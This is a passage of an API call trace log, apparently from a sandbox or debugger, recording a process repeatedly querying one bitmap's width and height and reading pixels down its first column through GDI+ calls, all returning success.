[0181.513] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.513] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=20, color=0x19e028) returned 0x0
[0181.513] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.513] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.513] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=21, color=0x19e028) returned 0x0
[0181.513] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.513] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.513] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=22, color=0x19e028) returned 0x0
[0181.513] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.513] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.513] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=23, color=0x19e028) returned 0x0
[0181.513] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.513] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.513] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=24, color=0x19e028) returned 0x0
[0181.514] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.514] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.514] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=25, color=0x19e028) returned 0x0
[0181.514] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.514] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.514] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=26, color=0x19e028) returned 0x0
[0181.514] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.514] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.514] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=27, color=0x19e028) returned 0x0
[0181.514] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.514] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.514] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=28, color=0x19e028) returned 0x0
[0181.514] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.514] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.514] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=29, color=0x19e028) returned 0x0
[0181.514] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.514] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.515] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=30, color=0x19e028) returned 0x0
[0181.515] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.515] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.515] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=31, color=0x19e028) returned 0x0
[0181.515] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.515] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.515] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=32, color=0x19e028) returned 0x0
[0181.515] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.515] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.515] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=33, color=0x19e028) returned 0x0
[0181.515] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.515] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.515] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=34, color=0x19e028) returned 0x0
[0181.515] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.515] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.515] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=35, color=0x19e028) returned 0x0
[0181.515] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.515] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.515] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=36, color=0x19e028) returned 0x0
[0181.516] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.516] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.516] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=37, color=0x19e028) returned 0x0
[0181.516] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.516] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.516] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=38, color=0x19e028) returned 0x0
[0181.516] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.516] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.516] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=39, color=0x19e028) returned 0x0
[0181.516] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.516] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.516] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=40, color=0x19e028) returned 0x0
[0181.516] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.516] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.516] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=41, color=0x19e028) returned 0x0
[0181.516] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.516] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.516] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=42, color=0x19e028) returned 0x0
[0181.517] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.517] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.517] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=43, color=0x19e028) returned 0x0
[0181.517] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.517] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.517] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=44, color=0x19e028) returned 0x0
[0181.517] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.517] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.517] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=45, color=0x19e028) returned 0x0
[0181.517] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.517] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.517] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=46, color=0x19e028) returned 0x0
[0181.517] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.517] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.517] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=47, color=0x19e028) returned 0x0
[0181.517] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.517] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.517] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=48, color=0x19e028) returned 0x0
[0181.518] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.518] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.518] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=49, color=0x19e028) returned 0x0
[0181.518] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.518] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.518] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=50, color=0x19e028) returned 0x0
[0181.518] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.518] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.518] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=51, color=0x19e028) returned 0x0
[0181.518] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.518] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.518] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=52, color=0x19e028) returned 0x0
[0181.518] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.518] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.518] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=53, color=0x19e028) returned 0x0
[0181.518] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.518] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.519] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=54, color=0x19e028) returned 0x0
[0181.519] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.519] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.519] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=55, color=0x19e028) returned 0x0
[0181.519] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.519] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.519] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=56, color=0x19e028) returned 0x0
[0181.519] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.519] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.519] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=57, color=0x19e028) returned 0x0
[0181.519] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.519] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.519] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=58, color=0x19e028) returned 0x0
[0181.519] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.519] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.519] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=59, color=0x19e028) returned 0x0
[0181.519] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.519] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.520] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=60, color=0x19e028) returned 0x0
[0181.520] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.520] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.520] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=61, color=0x19e028) returned 0x0
[0181.520] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.520] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.520] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=62, color=0x19e028) returned 0x0
[0181.520] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.520] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.520] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=63, color=0x19e028) returned 0x0
[0181.520] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.520] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.520] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=64, color=0x19e028) returned 0x0
[0181.520] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.520] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.520] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=65, color=0x19e028) returned 0x0
[0181.520] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.520] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.521] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=66, color=0x19e028) returned 0x0
[0181.521] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.521] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.521] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=67, color=0x19e028) returned 0x0
[0181.521] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.521] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.521] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=68, color=0x19e028) returned 0x0
[0181.521] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.521] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.521] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=69, color=0x19e028) returned 0x0
[0181.521] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.521] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.521] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=70, color=0x19e028) returned 0x0
[0181.521] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.521] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.521] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=71, color=0x19e028) returned 0x0
[0181.521] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.521] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.522] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=72, color=0x19e028) returned 0x0
[0181.522] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.522] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.522] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=73, color=0x19e028) returned 0x0
[0181.522] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.522] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.522] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=74, color=0x19e028) returned 0x0
[0181.522] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.522] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.522] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=75, color=0x19e028) returned 0x0
[0181.522] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.522] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.522] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=76, color=0x19e028) returned 0x0
[0181.522] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.525] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.525] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=77, color=0x19e028) returned 0x0
[0181.525] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.525] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.525] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=78, color=0x19e028) returned 0x0
[0181.525] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.525] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.525] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=79, color=0x19e028) returned 0x0
[0181.525] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.526] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.526] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=80, color=0x19e028) returned 0x0
[0181.526] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.526] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.526] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=81, color=0x19e028) returned 0x0
[0181.526] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.526] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.526] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=82, color=0x19e028) returned 0x0
[0181.526] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.526] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.526] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=83, color=0x19e028) returned 0x0
[0181.526] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.526] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.526] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=84, color=0x19e028) returned 0x0
[0181.526] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.526] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.526] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=85, color=0x19e028) returned 0x0
[0181.526] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.526] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.526] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=86, color=0x19e028) returned 0x0
[0181.527] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.527] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.527] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=87, color=0x19e028) returned 0x0
[0181.527] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.527] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.527] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=88, color=0x19e028) returned 0x0
[0181.527] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.527] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.527] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=89, color=0x19e028) returned 0x0
[0181.527] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.527] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.527] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=90, color=0x19e028) returned 0x0
[0181.527] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.527] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.527] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=91, color=0x19e028) returned 0x0
[0181.527] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.528] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.528] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=92, color=0x19e028) returned 0x0
[0181.528] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.528] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.528] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=93, color=0x19e028) returned 0x0
[0181.528] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.528] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.528] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=94, color=0x19e028) returned 0x0
[0181.528] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.528] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.528] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=95, color=0x19e028) returned 0x0
[0181.528] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.528] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.528] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=96, color=0x19e028) returned 0x0
[0181.528] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.528] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.528] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=97, color=0x19e028) returned 0x0
[0181.528] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.528] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.528] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=98, color=0x19e028) returned 0x0
[0181.528] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.528] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.529] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=99, color=0x19e028) returned 0x0
[0181.529] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.529] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.529] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=100, color=0x19e028) returned 0x0
[0181.529] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.529] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.529] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=101, color=0x19e028) returned 0x0
[0181.529] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.529] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.529] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=102, color=0x19e028) returned 0x0
[0181.529] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.529] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.529] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=103, color=0x19e028) returned 0x0
[0181.529] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.529] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.529] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=104, color=0x19e028) returned 0x0
[0181.529] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.529] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.529] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=105, color=0x19e028) returned 0x0
[0181.529] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.529] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.529] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=106, color=0x19e028) returned 0x0
[0181.530] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.530] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.530] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=107, color=0x19e028) returned 0x0
[0181.530] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.530] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.530] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=108, color=0x19e028) returned 0x0
[0181.530] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.530] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.530] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=109, color=0x19e028) returned 0x0
[0181.530] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.530] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.530] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=110, color=0x19e028) returned 0x0
[0181.530] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.530] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.530] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=111, color=0x19e028) returned 0x0
[0181.530] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.530] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.530] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=112, color=0x19e028) returned 0x0
[0181.530] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.530] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.530] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=113, color=0x19e028) returned 0x0
[0181.530] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.531] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.531] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=114, color=0x19e028) returned 0x0
[0181.531] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.531] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.531] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=115, color=0x19e028) returned 0x0
[0181.531] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.531] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.531] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=116, color=0x19e028) returned 0x0
[0181.531] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.531] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.531] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=117, color=0x19e028) returned 0x0
[0181.531] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.531] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.531] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=118, color=0x19e028) returned 0x0
[0181.531] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.531] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.531] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=119, color=0x19e028) returned 0x0
[0181.531] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.531] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.531] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=120, color=0x19e028) returned 0x0
[0181.531] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.531] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.531] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=121, color=0x19e028) returned 0x0
[0181.532] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.532] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.532] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=122, color=0x19e028) returned 0x0
[0181.532] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.532] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.532] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=123, color=0x19e028) returned 0x0
[0181.532] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.532] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.532] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=124, color=0x19e028) returned 0x0
[0181.532] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.532] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.532] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=125, color=0x19e028) returned 0x0
[0181.532] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.532] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.532] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=126, color=0x19e028) returned 0x0
[0181.532] GdipGetImageWidth (image=0x5cdf268, width=0x19e018) returned 0x0
[0181.532] GdipGetImageHeight (image=0x5cdf268, height=0x19e018) returned 0x0
[0181.532] GdipBitmapGetPixel (bitmap=0x5cdf268, x=0, y=127, color=0x19e028) returned 0x0
